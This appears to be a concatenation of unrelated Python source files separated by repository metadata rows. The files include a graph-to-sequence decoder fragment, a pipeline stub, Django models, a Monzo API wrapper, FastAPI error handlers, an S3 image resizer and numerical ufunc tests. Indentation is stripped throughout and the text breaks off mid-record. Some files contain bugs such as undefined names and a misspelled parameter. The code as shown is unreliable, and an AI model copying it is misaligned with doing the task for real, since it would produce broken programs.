freq_features = self.freq_embed(ex['context_freq'])
enc_input_cat.append(freq_features)
if self.f_dep:
dep_features = self.edge_embed(ex['context_dep'])
enc_input_cat.append(dep_features)
if self.f_ans:
answer_tensor = ex['answers']
answer_lengths = ex['answer_lens']
ans_mask = create_mask(answer_lengths, answer_tensor.size(1), self.device)
ans_embedded = self.word_embed(self.filter_oov(answer_tensor, ext_vocab_size))
ans_embedded = dropout(ans_embedded, self.word_dropout, shared_axes=[-2], training=self.training)
enc_answer_cat = [ans_embedded]
if self.dan_type in ('all', 'word'):
# Align answer info to passage at the word level
ctx_aware_ans_emb = self.ctx2ans_attn_l1(encoder_embedded, ans_embedded, ans_embedded, ans_mask)
enc_input_cat.append(ctx_aware_ans_emb)
if self.use_bert:
context_bert = ex['context_bert']
if not self.finetune_bert:
assert context_bert.requires_grad == False
if self.use_bert_weight:
weights_bert_layers = torch.softmax(self.logits_bert_layers, dim=-1)
if self.use_bert_gamma:
weights_bert_layers = weights_bert_layers * self.gamma_bert_layers
context_bert = torch.mm(weights_bert_layers, context_bert.view(context_bert.size(0), -1)).view(context_bert.shape[1:])
context_bert = dropout(context_bert, self.bert_dropout, shared_axes=[-2], training=self.training)
enc_input_cat.append(context_bert)
if self.f_ans and self.dan_type in ('all', 'hidden'):
answer_bert = ex['answer_bert']
if not self.finetune_bert:
assert answer_bert.requires_grad == False
answer_bert = torch.mm(weights_bert_layers, answer_bert.view(answer_bert.size(0), -1)).view(answer_bert.shape[1:])
answer_bert = dropout(answer_bert, self.bert_dropout, shared_axes=[-2], training=self.training)
enc_answer_cat.append(answer_bert)
raw_input_vec = torch.cat(enc_input_cat, -1)
encoder_outputs = self.ctx_rnn_encoder(raw_input_vec, input_lengths)[0].transpose(0, 1)
if self.f_ans and self.dan_type in ('all', 'hidden'):
# Align answer info to passage at the hidden state level
enc_answer_cat = torch.cat(enc_answer_cat, -1)
ans_encoder_outputs = self.ans_rnn_encoder(enc_answer_cat, answer_lengths)[0].transpose(0, 1)
enc_cat_l2 = torch.cat([encoder_embedded, encoder_outputs], -1)
ans_cat_l2 = torch.cat([ans_embedded, ans_encoder_outputs], -1)
if self.use_bert:
enc_cat_l2 = torch.cat([enc_cat_l2, context_bert], -1)
ans_cat_l2 = torch.cat([ans_cat_l2, answer_bert], -1)
ctx_aware_ans_emb = self.ctx2ans_attn_l2(enc_cat_l2, \
ans_cat_l2, ans_encoder_outputs, ans_mask)
encoder_outputs = self.ctx_rnn_encoder_l2(torch.cat([encoder_outputs, ctx_aware_ans_emb], -1), \
input_lengths)[0].transpose(0, 1)
input_graphs = ex['context_graphs']
if self.message_function == 'edge_mm':
edge_vec = input_graphs['edge_features']
else:
edge_vec = self.edge_embed(input_graphs['edge_features'])
node_embedding, graph_embedding = self.graph_encoder(encoder_outputs, \
edge_vec, (input_graphs['node2edge'], input_graphs['edge2node']), \
node_mask=input_mask, raw_node_vec=raw_input_vec)
encoder_outputs = node_embedding
encoder_state = (graph_embedding, graph_embedding) if self.rnn_type == 'lstm' else graph_embedding
# initialize return values
r = Graph2SeqOutput(encoder_outputs, encoder_state,
torch.zeros(target_length, batch_size, dtype=torch.long))
if visualize:
r.enc_attn_weights = torch.zeros(target_length, batch_size, input_length)
if self.pointer:
r.ptr_probs = torch.zeros(target_length, batch_size)
if self.enc_dec_adapter is None:
decoder_state = encoder_state
else:
if self.rnn_type == 'lstm':
decoder_state = tuple([self.enc_dec_adapter[i](x) for i, x in enumerate(encoder_state)])
else:
decoder_state = self.enc_dec_adapter(encoder_state)
decoder_hiddens = []
enc_attn_weights = []
enc_context = None
dec_prob_ptr_tensor = []
decoder_input = to_cuda(torch.tensor([self.word_vocab.SOS] * batch_size), self.device)
for di in range(target_length):
decoder_embedded = self.word_embed(self.filter_oov(decoder_input, ext_vocab_size))
decoder_embedded = dropout(decoder_embedded, self.word_dropout, shared_axes=[-2], training=self.training)
if enc_attn_weights:
coverage_vector = self.get_coverage_vector(enc_attn_weights)
else:
coverage_vector = None
decoder_output, decoder_state, dec_enc_attn, dec_prob_ptr, enc_context = \
self.decoder(decoder_embedded, decoder_state, encoder_outputs,
torch.cat(decoder_hiddens) if decoder_hiddens else None, coverage_vector,
input_mask=input_mask,
encoder_word_idx=input_tensor, ext_vocab_size=ext_vocab_size,
log_prob=log_prob,
prev_enc_context=enc_context)
dec_prob_ptr_tensor.append(dec_prob_ptr)
if self.dec_attn:
decoder_hiddens.append(decoder_state[0] if self.rnn_type == 'lstm' else decoder_state)
# save the decoded tokens
if not sample:
_, top_idx = decoder_output.data.topk(1) # top_idx shape: (batch size, k=1)
else:
prob_distribution = torch.exp(decoder_output) if log_prob else decoder_output
top_idx = torch.multinomial(prob_distribution, 1)
top_idx = top_idx.squeeze(1).detach() # detach from history as input
r.decoded_tokens[di] = top_idx
# decide the next input
if use_teacher_forcing or (use_teacher_forcing is None and random.random() < forcing_ratio):
decoder_input = target_tensor[di] # teacher forcing
else:
decoder_input = top_idx
# compute loss
if criterion:
if target_tensor is None:
gold_standard = top_idx # for sampling
else:
gold_standard = target_tensor[di] if not rl_loss else decoder_input
if not log_prob:
decoder_output = torch.log(decoder_output + VERY_SMALL_NUMBER) # necessary for NLLLoss
if criterion_reduction:
nll_loss = criterion(decoder_output, gold_standard)
r.loss += nll_loss
r.loss_value += nll_loss.item()
else:
nll_loss = F.nll_loss(decoder_output, gold_standard, ignore_index=self.word_vocab.PAD, reduction='none')
r.loss += nll_loss
r.loss_value += nll_loss
# update attention history and compute coverage loss
if self.enc_attn_cover or (criterion and self.cover_loss > 0):
if not criterion_nll_only and coverage_vector is not None and criterion and self.cover_loss > 0:
if criterion_reduction:
coverage_loss = torch.sum(torch.min(coverage_vector, dec_enc_attn)) / batch_size * self.cover_loss
r.loss += coverage_loss
if include_cover_loss: r.loss_value += coverage_loss.item()
else:
coverage_loss = torch.sum(torch.min(coverage_vector, dec_enc_attn), dim=-1) * self.cover_loss
r.loss += coverage_loss
if include_cover_loss: r.loss_value += coverage_loss
enc_attn_weights.append(dec_enc_attn.unsqueeze(0))
# save data for visualization
if visualize:
r.enc_attn_weights[di] = dec_enc_attn.data
if self.pointer:
r.ptr_probs[di] = dec_prob_ptr.squeeze(1).data
# compute pointer network loss
if not criterion_nll_only and criterion and self.pointer_loss_ratio > 0 and target_tensor is not None:
dec_prob_ptr_tensor = torch.cat(dec_prob_ptr_tensor, -1)
pointer_loss = F.binary_cross_entropy(dec_prob_ptr_tensor, ex['target_copied'], reduction='none')
if criterion_reduction:
pointer_loss = torch.sum(pointer_loss * target_mask) / batch_size * self.pointer_loss_ratio
r.loss += pointer_loss
r.loss_value += pointer_loss.item()
else:
pointer_loss = torch.sum(pointer_loss * target_mask, dim=-1) * self.pointer_loss_ratio
r.loss += pointer_loss
r.loss_value += pointer_loss
return r
| 46.948357
| 194
| 0.6892
| 19,634
| 0.9817
| 0
| 0
| 0
| 0
| 0
| 0
| 4,337
| 0.21685
|
220aabb343a26ce1e8cadcc4df4a8b3a8adedfdb
| 2,939
|
py
|
Python
|
towhee/engine/pipeline.py
|
jeffoverflow/towhee
|
c576d22a4cdfc3909a3323b0d1decab87e83d26c
|
[
"Apache-2.0"
] | null | null | null |
towhee/engine/pipeline.py
|
jeffoverflow/towhee
|
c576d22a4cdfc3909a3323b0d1decab87e83d26c
|
[
"Apache-2.0"
] | null | null | null |
towhee/engine/pipeline.py
|
jeffoverflow/towhee
|
c576d22a4cdfc3909a3323b0d1decab87e83d26c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from towhee.engine.graph_context import GraphContext
from towhee.dag.graph_repr import GraphRepr
from towhee.dataframe.dataframe import DFIterator
class Pipeline:
"""
The runtime pipeline context
"""
def __init__(self, engine: Engine, graph_repr: GraphRepr, parallelism: int = 1) -> None:
"""
Args:
engine: the local engine to drive the Pipeline
graph_repr: the graph representation
parallelism: how many rows of inputs to be processed concurrently
"""
self._engine = engine
self._graph_repr = graph_repr
self._parallelism = parallelism
def build(self):
"""
Create GraphContexts and set up input iterators.
"""
raise NotImplementedError
def run(self, inputs: list) -> DFIterator:
"""
The Pipeline's main loop
Agrs:
inputs: the input data, organized as a list of DataFrame, feeding
to the Pipeline.
"""
# while we still have pipeline inputs:
# input = inputs.next()
# for g in graph contexts:
# if g.is_idle:
# g.start_op.inputs = input
# break
# if all graphs contexts are busy:
# wait for notification from _notify_run_loop
raise NotImplementedError
def on_start(self, handler: function):
"""
Set a custom handler that called before the execution of the graph.
"""
self._on_start_handler = handler
raise NotImplementedError
def on_finish(self, handler: function):
"""
Set a custom handler that called after the execution of the graph.
"""
self._on_finish_handler = handler
raise NotImplementedError
def _organize_outputs(self, graph_ctx: GraphContext):
"""
on_finish handler passing to GraphContext. The handler will organize the
GraphContext's output into Pipeline's outputs.
"""
raise NotImplementedError
def _notify_run_loop(self, graph_ctx: GraphContext):
"""
on_finish handler passing to GraphContext. The handler will notify the run loop
that a GraphContext is in idle state.
"""
raise NotImplementedError
| 33.397727
| 92
| 0.638312
| 2,195
| 0.746853
| 0
| 0
| 0
| 0
| 0
| 0
| 1,834
| 0.624022
|
220ccdab937624a53d838d42a5f734ee87cb22a8
| 744
|
py
|
Python
|
portfolio/models.py
|
MrInternauta/Python-Django-Portafolio-web-administrable
|
0df6f76cb5bdc2f28eb691d21f3592f7f082ce80
|
[
"MIT"
] | null | null | null |
portfolio/models.py
|
MrInternauta/Python-Django-Portafolio-web-administrable
|
0df6f76cb5bdc2f28eb691d21f3592f7f082ce80
|
[
"MIT"
] | null | null | null |
portfolio/models.py
|
MrInternauta/Python-Django-Portafolio-web-administrable
|
0df6f76cb5bdc2f28eb691d21f3592f7f082ce80
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class Project(models.Model):
title = models.CharField(max_length = 200, verbose_name = "Titulo")
description = models.TextField(verbose_name="Descripcion")
image = models.ImageField(verbose_name="Imagen", upload_to = "projects")
link = models.URLField(null=True, blank=True, verbose_name="Direecion web")
created = models.DateTimeField(auto_now_add=True, verbose_name="Fecha de creacion")
updated = models.DateTimeField(auto_now=True, verbose_name="Fecha de actualizacion")
class Meta:
verbose_name = 'proyecto'
verbose_name_plural = 'proyectos'
ordering = ['-created']
def __str__(self):
return self.title
| 43.764706
| 89
| 0.701613
| 684
| 0.919355
| 0
| 0
| 0
| 0
| 0
| 0
| 155
| 0.208333
|
220d1b0d3abc6c0db8d6bd13778e65f09dbb4290
| 231
|
py
|
Python
|
src/notifications/tests.py
|
kullo/webconfig
|
470839ed77fda11634d4e14a89bb5e7894aa707d
|
[
"BSD-3-Clause"
] | null | null | null |
src/notifications/tests.py
|
kullo/webconfig
|
470839ed77fda11634d4e14a89bb5e7894aa707d
|
[
"BSD-3-Clause"
] | null | null | null |
src/notifications/tests.py
|
kullo/webconfig
|
470839ed77fda11634d4e14a89bb5e7894aa707d
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2015–2020 Kullo GmbH
#
# This source code is licensed under the 3-clause BSD license. See LICENSE.txt
# in the root directory of this source tree for details.
from django.test import TestCase
# Create your tests here.
| 28.875
| 78
| 0.774892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 194
| 0.832618
|
220da7c8db31ca8e3ea4491d39c1e1bb6b8b46fe
| 1,018
|
py
|
Python
|
examples/cam.py
|
jtme/button-shim
|
19b80a236866fad068e6d3aeb643a1270d6ae934
|
[
"MIT"
] | null | null | null |
examples/cam.py
|
jtme/button-shim
|
19b80a236866fad068e6d3aeb643a1270d6ae934
|
[
"MIT"
] | null | null | null |
examples/cam.py
|
jtme/button-shim
|
19b80a236866fad068e6d3aeb643a1270d6ae934
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import signal
import buttonshim
print("""
Button SHIM: rainbow.py
Command on button press.
Press Ctrl+C to exit.
""")
import commands
@buttonshim.on_press(buttonshim.BUTTON_A)
def button_a(button, pressed):
buttonshim.set_pixel(0x94, 0x00, 0xd3)
s=commands.getstatusoutput("raspistill -w 320 -h 240 -o IMG/snap.jpg")
print s
if s[0] != 0:
self.output(s[1], s[0])
else:
self.output("error occured", status[0])
@buttonshim.on_press(buttonshim.BUTTON_B)
def button_b(button, pressed):
buttonshim.set_pixel(0x00, 0x00, 0xff)
@buttonshim.on_press(buttonshim.BUTTON_C)
def button_c(button, pressed):
buttonshim.set_pixel(0x00, 0xff, 0x00)
@buttonshim.on_press(buttonshim.BUTTON_D)
def button_d(button, pressed):
buttonshim.set_pixel(0xff, 0xff, 0x00)
@buttonshim.on_press(buttonshim.BUTTON_E)
def button_e(button, pressed):
buttonshim.set_pixel(0xff, 0x00, 0x00)
signal.pause()
| 19.960784
| 74
| 0.681729
| 0
| 0
| 0
| 0
| 795
| 0.780943
| 0
| 0
| 160
| 0.157171
|
220e0c7e4d7e7b9e561c692a325977f16ecf70b4
| 153
|
py
|
Python
|
built-in/TensorFlow/Official/cv/image_classification/ResnetVariant_for_TensorFlow/automl/vega/algorithms/nas/sm_nas/mmdet_meta_cfgs/bbox_head/__init__.py
|
Huawei-Ascend/modelzoo
|
df51ed9c1d6dbde1deef63f2a037a369f8554406
|
[
"Apache-2.0"
] | 12
|
2020-12-13T08:34:24.000Z
|
2022-03-20T15:17:17.000Z
|
built-in/TensorFlow/Official/cv/image_classification/ResnetVariant_for_TensorFlow/automl/vega/algorithms/nas/sm_nas/mmdet_meta_cfgs/bbox_head/__init__.py
|
Huawei-Ascend/modelzoo
|
df51ed9c1d6dbde1deef63f2a037a369f8554406
|
[
"Apache-2.0"
] | 3
|
2021-03-31T20:15:40.000Z
|
2022-02-09T23:50:46.000Z
|
built-in/TensorFlow/Research/cv/image_classification/Darts_for_TensorFlow/automl/vega/algorithms/nas/sm_nas/mmdet_meta_cfgs/bbox_head/__init__.py
|
Huawei-Ascend/modelzoo
|
df51ed9c1d6dbde1deef63f2a037a369f8554406
|
[
"Apache-2.0"
] | 2
|
2021-07-10T12:40:46.000Z
|
2021-12-17T07:55:15.000Z
|
from .cascade_head import CascadeFCBBoxHead
from .convfc_bbox_head import SharedFCBBoxHead
__all__ = [
'CascadeFCBBoxHead',
'SharedFCBBoxHead']
| 21.857143
| 46
| 0.79085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 37
| 0.24183
|
221167d3228359aec0ed9b72908eb095312e240f
| 3,146
|
py
|
Python
|
monzo/model/monzoaccount.py
|
elementechemlyn/pythonzo
|
ff6124119c7fe8c68c4bfa0e5d59b79ad442c1fc
|
[
"MIT"
] | null | null | null |
monzo/model/monzoaccount.py
|
elementechemlyn/pythonzo
|
ff6124119c7fe8c68c4bfa0e5d59b79ad442c1fc
|
[
"MIT"
] | 1
|
2021-06-01T22:01:40.000Z
|
2021-06-01T22:01:40.000Z
|
monzo/model/monzoaccount.py
|
elementechemlyn/pythonzo
|
ff6124119c7fe8c68c4bfa0e5d59b79ad442c1fc
|
[
"MIT"
] | null | null | null |
import datetime
from .monzobalance import MonzoBalance
from .monzopagination import MonzoPaging
from .monzotransaction import MonzoTransaction
class MonzoAccount(object):
def __init__(self,api,json_dict=None):
self.api = api
self.account_id = None
self.created = None
self.description = None
self.account_type = None
self.balance = None
if json_dict:
self.account_id = json_dict.get("id",None)
self.description = json_dict.get("description",None)
self.account_type = json_dict.get("type",None)
self.created = json_dict.get("created",None)
if self.created:
self.created = datetime.datetime.strptime(self.created,"%Y-%m-%dT%H:%M:%S.%fZ")
@classmethod
def listAccounts(cls,api):
accounts = []
accounts_json = api.listAccounts()
for account_json in accounts_json["accounts"]:
account = cls(api,account_json)
accounts.append(account)
return accounts
@classmethod
def getAccount(cls,api,account_id):
accounts_json = api.listAccounts()
for account_json in accounts_json["accounts"]:
account = cls(api,account_json)
if account.account_id == account_id:
account.readBalance()
return account
return None
def readBalance(self):
balance_json = self.api.readBalance(self.account_id)
self.balance = MonzoBalance(self.api,balance_json)
return self.balance
def listTransactionsThisMonth(self,expand=None):
now = datetime.datetime.now()
this_month = now.replace(day=1,hour=0,minute=0,second=0,microsecond=0)
page = MonzoPaging()
page.set_since_date(this_month)
return self.listTransactions(page,expand)
def listTransactionsToday(self,expland=None):
now = datetime.datetime.now()
today = now.replace(hour=0,minute=0,second=0,microsecond=0)
page = MonzoPaging()
page.set_since_date(today)
return self.listTransactions(page,expand)
def listTransactionSinceDate(self,from_dt,expand=None):
page = MonzoPaging()
page.set_since_date(from_dt)
return self.listTransactions(page,expand)
def listTransactionsSinceTransaction(self,trans_id,expand=None):
page = MonzoPaging()
page.set_since_trans(trans_id)
return self.listTransactions(page,expand)
def listTransactionsBetween(self,since_dt,to_dt,expand=None):
page = MonzoPaging()
page.set_since_date(since_dt)
page.set_before(to_dt)
return self.listTransactions(page,expand)
def listTransactions(self,pagination=None,expand=None):
transactions = []
transactions_json = self.api.listTransactions(self.account_id,pagination,expand)
for transaction_json in transactions_json["transactions"]:
transaction = MonzoTransaction(self.api,transaction_json)
transactions.append(transaction)
return transactions
| 35.75
| 95
| 0.651939
| 2,991
| 0.950731
| 0
| 0
| 600
| 0.190718
| 0
| 0
| 89
| 0.02829
|
22117a7dbdd2a79f096b01e929739e3fe71da985
| 3,718
|
py
|
Python
|
learninghouse/api/errors/__init__.py
|
DerOetzi/learninghouse-core
|
ece900b2a333b8ea9710609322cfefeeaf694cf8
|
[
"MIT"
] | 1
|
2021-11-02T13:52:11.000Z
|
2021-11-02T13:52:11.000Z
|
learninghouse/api/errors/__init__.py
|
DerOetzi/learninghouse-core
|
ece900b2a333b8ea9710609322cfefeeaf694cf8
|
[
"MIT"
] | null | null | null |
learninghouse/api/errors/__init__.py
|
DerOetzi/learninghouse-core
|
ece900b2a333b8ea9710609322cfefeeaf694cf8
|
[
"MIT"
] | 1
|
2020-08-27T20:03:36.000Z
|
2020-08-27T20:03:36.000Z
|
from typing import Dict, Optional
from fastapi import status, Request
from fastapi.responses import JSONResponse
from fastapi.exceptions import RequestValidationError
from learninghouse.models import LearningHouseErrorMessage
MIMETYPE_JSON = 'application/json'
class LearningHouseException(Exception):
STATUS_CODE = status.HTTP_500_INTERNAL_SERVER_ERROR
UNKNOWN = 'UNKNOWN'
DESCRIPTION = 'An unknown exception occurred ' +\
'while handling your request.'
def __init__(self,
status_code: Optional[int] = None,
key: Optional[str] = None,
description: Optional[str] = None):
super().__init__()
self.http_status_code: int = status_code or self.STATUS_CODE
self.error: LearningHouseErrorMessage = LearningHouseErrorMessage(
error=key or self.UNKNOWN,
description=description or self.DESCRIPTION
)
def response(self) -> JSONResponse:
return JSONResponse(content=self.error.dict(), status_code=self.http_status_code)
@classmethod
def api_description(cls) -> Dict:
return {
'model': LearningHouseErrorMessage,
'description': 'An exception occured which is not handled by the service now. ' +
'Please write an issue on GitHub.',
'content': {
MIMETYPE_JSON: {
'example': {
'error': cls.UNKNOWN,
'description': cls.DESCRIPTION
}
}
}
}
class LearningHouseSecurityException(LearningHouseException):
STATUS_CODE = status.HTTP_403_FORBIDDEN
SECURITY_EXCEPTION = 'SECURITY_EXCEPTION'
DESCRIPTION = 'A security violation occured while handling your request.'
def __init__(self, description: str):
super().__init__(self.STATUS_CODE,
self.SECURITY_EXCEPTION,
description or self.DESCRIPTION)
@classmethod
def api_description(cls) -> Dict:
return {
'model': LearningHouseErrorMessage,
'description': 'The request didn\'t pass security checks.',
'content': {
MIMETYPE_JSON: {
'example': {
'error': cls.SECURITY_EXCEPTION,
'description': cls.DESCRIPTION
}
}
}
}
class LearningHouseValidationError(LearningHouseException):
STATUS_CODE = status.HTTP_422_UNPROCESSABLE_ENTITY
VALIDATION_ERROR = 'VALIDATION_ERROR'
DESCRIPTION = 'A validation error occurred while handling your request.'
def __init__(self, description: Optional[str] = None):
super().__init__(self.STATUS_CODE,
self.VALIDATION_ERROR,
description or self.DESCRIPTION)
@classmethod
def api_description(cls) -> Dict:
return {
'model': LearningHouseErrorMessage,
'description': 'The request didn\'t pass input validation',
'content': {
MIMETYPE_JSON: {
'example': {
'error': cls.VALIDATION_ERROR,
'description': cls.DESCRIPTION
}
}
}
}
async def validation_error_handler(request: Request, exc: RequestValidationError) -> JSONResponse: # pylint: disable=unused-argument
return LearningHouseValidationError(str(exc)).response()
async def learninghouse_exception_handler(request: Request, exc: LearningHouseException): # pylint: disable=unused-argument
return exc.response()
| 34.747664
| 133
| 0.604088
| 3,095
| 0.832437
| 0
| 0
| 1,419
| 0.381657
| 344
| 0.092523
| 668
| 0.179666
|
2212ba611cd09cc95cb9831180998a6882517ddf
| 1,751
|
py
|
Python
|
moda/dataprep/create_dataset.py
|
Patte1808/moda
|
312c9594754ae0f6d17cbfafaa2c4c790c58efe5
|
[
"MIT"
] | null | null | null |
moda/dataprep/create_dataset.py
|
Patte1808/moda
|
312c9594754ae0f6d17cbfafaa2c4c790c58efe5
|
[
"MIT"
] | null | null | null |
moda/dataprep/create_dataset.py
|
Patte1808/moda
|
312c9594754ae0f6d17cbfafaa2c4c790c58efe5
|
[
"MIT"
] | null | null | null |
import pandas as pd
def get_windowed_ts(ranged_ts, window_size, with_actual=True):
"""
Creates a data frame where each row is a window of samples from the time series.
Each consecutive row is a shift of 1 cell from the previous row.
For example: [[1,2,3],[2,3,4],[3,4,5]]
:param ranged_ts: a pd.DataFrame containing one column for values and one pd.DatetimeIndex for dates
:param window_size: The number of timestamps to be used as features
:param with_actual: Whether to increase window size by one, and treat the last column as the ground truth
(relevant for forecasting scenarios). Returns the same output just with a window size bigger by 1.
:return:
"""
windowed_ts = ranged_ts
windowed_ts_copy = windowed_ts.copy()
for i in range(window_size - 1 + int(with_actual)):
windowed_ts = pd.concat([windowed_ts, windowed_ts_copy.shift(-(i + 1))], axis=1)
windowed_ts = windowed_ts.dropna(axis=0)
return windowed_ts
def split_history_and_current(windowed_ts):
"""
Returns the first n-1 columns as X, and the last column as y. Useful mainly for forecasting scenarios
:param windowed_ts: a pd.DataFrame with a date index and a column per timestamp. see get_windowed_ts
:return:
"""
X = windowed_ts.iloc[:, :-1].values
y = windowed_ts.iloc[:, -1].values
return (X, y)
if __name__ == "__main__":
ranged_ts = pd.DataFrame({"date": range(6), "value": range(6)})
ranged_ts["date"] = pd.to_datetime(ranged_ts["date"])
ranged_ts = ranged_ts.set_index(pd.DatetimeIndex(ranged_ts["date"]))
ranged_ts = ranged_ts.drop(columns="date")
ranged_ts.head()
windowed_df = get_windowed_ts(ranged_ts, window_size=3, with_actual=False)
| 38.065217
| 109
| 0.703027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 894
| 0.510565
|
22135083df33d8282602ed03efa2652030de4212
| 1,310
|
py
|
Python
|
test/test_ufunc.py
|
tuwien-cms/xprec
|
8f213aa9475342000883a56c56d54bb5208eb930
|
[
"MIT"
] | 6
|
2021-10-01T16:35:27.000Z
|
2022-01-05T18:21:39.000Z
|
test/test_ufunc.py
|
tuwien-cms/xprec
|
8f213aa9475342000883a56c56d54bb5208eb930
|
[
"MIT"
] | 8
|
2022-01-20T20:33:26.000Z
|
2022-03-25T09:27:49.000Z
|
test/test_ufunc.py
|
tuwien-cms/xprec
|
8f213aa9475342000883a56c56d54bb5208eb930
|
[
"MIT"
] | 1
|
2022-01-21T22:49:16.000Z
|
2022-01-21T22:49:16.000Z
|
# Copyright (C) 2021 Markus Wallerberger and others
# SPDX-License-Identifier: MIT
import numpy as np
import xprec
def _compare_ufunc(ufunc, *args, ulps=1):
fx_d = ufunc(*args)
fx_q = ufunc(*(a.astype(xprec.ddouble) for a in args)).astype(float)
# Ensure relative accuracy of 2 ulps
np.testing.assert_array_almost_equal_nulp(fx_d, fx_q, ulps)
def test_log():
x = np.geomspace(1e-300, 1e300, 1953)
_compare_ufunc(np.log, x)
zeroq = xprec.ddouble.type(0)
assert np.isinf(np.log(zeroq))
def test_sqrt():
x = np.geomspace(1e-300, 1e300, 1953)
_compare_ufunc(np.sqrt, x)
def test_exp():
x = np.geomspace(1e-300, 700, 4953)
x = np.hstack([-x[::-1], 0, x])
_compare_ufunc(np.exp, x)
# Unfortunately, on Windows expm1 is less precise, so we need to increase
# the tolerance slightly
_compare_ufunc(np.expm1, x, ulps=2)
def test_cosh():
x = np.geomspace(1e-300, 700, 4953)
x = np.hstack([-x[::-1], 0, x])
_compare_ufunc(np.cosh, x)
_compare_ufunc(np.sinh, x)
thousand = xprec.ddouble.type(1000)
assert np.isinf(np.cosh(thousand))
assert np.isinf(np.cosh(-thousand))
def test_hypot():
x = np.geomspace(1e-300, 1e260, 47)
x = np.hstack([-x[::-1], 0, x])
_compare_ufunc(np.hypot, x[:,None], x[None,:])
| 24.716981
| 77
| 0.650382
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 214
| 0.163359
|
22135b653bd172de4f59e045357620ffd83da98a
| 48
|
py
|
Python
|
echolect/millstone/__init__.py
|
ryanvolz/echolect
|
ec2594925f34fdaea69b64e725fccb0c99665a55
|
[
"BSD-3-Clause"
] | 1
|
2022-03-24T22:48:12.000Z
|
2022-03-24T22:48:12.000Z
|
echolect/millstone/__init__.py
|
scivision/echolect
|
ec2594925f34fdaea69b64e725fccb0c99665a55
|
[
"BSD-3-Clause"
] | 1
|
2015-03-25T20:41:24.000Z
|
2015-03-25T20:41:24.000Z
|
echolect/millstone/__init__.py
|
scivision/echolect
|
ec2594925f34fdaea69b64e725fccb0c99665a55
|
[
"BSD-3-Clause"
] | null | null | null |
from .read_hdf5 import *
from .hdf5_api import *
| 24
| 24
| 0.770833
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
2214b7a4b4680d12ebfcca09d05d0ee1ade6215e
| 932
|
py
|
Python
|
pyptoolz/transforms.py
|
embedio/pyplinez
|
14b2e84d0f0bd86870d492a78f02c0b19810d3f6
|
[
"MIT"
] | null | null | null |
pyptoolz/transforms.py
|
embedio/pyplinez
|
14b2e84d0f0bd86870d492a78f02c0b19810d3f6
|
[
"MIT"
] | null | null | null |
pyptoolz/transforms.py
|
embedio/pyplinez
|
14b2e84d0f0bd86870d492a78f02c0b19810d3f6
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from toolz import itertoolz, curried
import vaex
transform_path_to_posix = lambda path: path.as_posix()
def path_to_posix():
return curried.valmap(transform_path_to_posix)
transform_xlsx_to_vaex = lambda path: vaex.from_ascii(path, seperator="\t")
def xlsx_to_vaex():
return curried.valmap(transform_ascii_to_vaex)
transform_ascii_to_vaex = lambda path: vaex.from_ascii(path, seperator="\t")
def ascii_to_vaex():
return curried.valmap(transform_ascii_to_vaex)
transform_ascii_to_vaex2 = lambda path: vaex.from_ascii(path)
def ascii_to_vaex2():
return curried.valmap(transform_ascii_to_vaex2)
transform_vaex_to_list = lambda df: [itertoolz.second(x) for x in df.iterrows()]
def vaex_rows_to_list():
return curried.valmap(transform_vaex_to_list)
transform_vaex_to_dict = lambda df: df.to_dict()
def vaex_to_dict():
return curried.valmap(transform_vaex_to_dict)
| 20.26087
| 80
| 0.784335
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 0.008584
|
2214dd004a4a327669decd49302d44af0c040bf5
| 1,409
|
py
|
Python
|
experiments/s3-image-resize/chalicelib/s3_helpers.py
|
llamapope/chalice-experiments
|
f08fa0bade19c2659788a0678d89a4a63c2402d5
|
[
"MIT"
] | null | null | null |
experiments/s3-image-resize/chalicelib/s3_helpers.py
|
llamapope/chalice-experiments
|
f08fa0bade19c2659788a0678d89a4a63c2402d5
|
[
"MIT"
] | 2
|
2021-06-08T20:56:46.000Z
|
2022-01-13T02:15:29.000Z
|
experiments/s3-image-resize/chalicelib/s3_helpers.py
|
llamapope/chalice-experiments
|
f08fa0bade19c2659788a0678d89a4a63c2402d5
|
[
"MIT"
] | null | null | null |
import PIL
from PIL import Image
from io import BytesIO
import re
def resize(s3_client, bucket, original_key, width, height, suffix):
obj = s3_client.get_object(Bucket=bucket, Key=original_key)
full_size_key = original_key.replace('__incoming/', '')
ext = re.sub(r'.+\.([^.]+)$', r'\1', full_size_key)
key = re.sub(r'\.[^.]+$', '', full_size_key)
content_type = obj['ContentType']
if content_type == 'image/png':
image_type = 'PNG'
elif content_type == 'image/jpg' or content_type == 'image/jpeg':
image_type = 'JPEG'
else:
raise Exception(f'Invalid image type: {content_type}')
obj_body = obj['Body'].read()
img = Image.open(BytesIO(obj_body))
img = img.resize((width, height), PIL.Image.ANTIALIAS)
buffer = BytesIO()
img.save(buffer, image_type)
buffer.seek(0)
resized_key=f"{key}-{suffix}.{ext}"
# write the resized image
obj = s3_client.put_object(
Key=resized_key,
Bucket=bucket,
Body=buffer,
ContentType=content_type,
ACL='public-read')
# move the original out of __incoming
s3_client.copy_object(
Bucket=bucket,
Key=full_size_key,
CopySource=f'{bucket}/{original_key}',
ACL='public-read')
s3_client.delete_object(Bucket=bucket, Key=original_key)
app.log.debug("resized: %s, key: %s",
bucket, key)
| 29.978723
| 69
| 0.628105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 308
| 0.218595
|
221552a2a64bb10ef85638e3e31fd395fcf10fcf
| 4,792
|
py
|
Python
|
synapse/handlers/room_member_worker.py
|
lukaslihotzki/synapse
|
1dfdc87b9bb07cc3c958dde7f41f2af4322477e5
|
[
"Apache-2.0"
] | 9,945
|
2015-01-02T07:41:06.000Z
|
